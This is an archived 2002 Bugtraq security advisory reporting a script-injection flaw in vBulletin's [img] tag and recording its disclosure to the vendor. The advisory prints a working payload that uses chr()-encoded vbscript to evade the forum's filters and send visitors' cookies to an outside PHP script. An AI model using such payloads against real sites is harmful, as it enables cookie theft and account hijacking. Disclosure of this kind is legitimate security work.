[img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe olders

From: Cano2 (Cano2@buhaboard.de)
Date: 03/20/02 

Date: Wed, 20 Mar 2002 19:29:30 +0100
From: Cano2 <Cano2@buhaboard.de>
To: bugtraq@securityfocus.com

Hi

I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in [code]-Tag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://".
            Sounds good ;)

 vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still
 sites using vulnerable versions, so better update!
 

lates, Cano2 mailto:Cano2@buhaboard.de 

--
Wirklich reich sind die, die mehr Träume haben als die Realität zerstören kann

BuHa-Security Board
www.buhaboard.de

Relevant Pages

  • On the ethical importance of death
    ... A religious web site has an article discussing ethics and makes the ... "they hold that death, far from being complicit with evil as religious ... lends serious gravity to the ethical demand which vulnerability imposes ... the ethical agent might die for the ...
    (uk.philosophy.humanism)
  • Re: discloser 0.0.4 Remote File Inclusion (with Exploit)
    ... or die "\n Could not connect!\n"; ... So there is no vulnerability, ... Carsten Eilers ... IT-Sicherheit und Datenschutz ...
    (Bugtraq)
  • Re: Possible Security Hole
    ... PaulK wrote: ... The generally accept practice is: ... To provide details of the vulnerability to the author of the package ... When I die, I want to die like my Grandmother who died peacefully ...
    (comp.os.linux.security)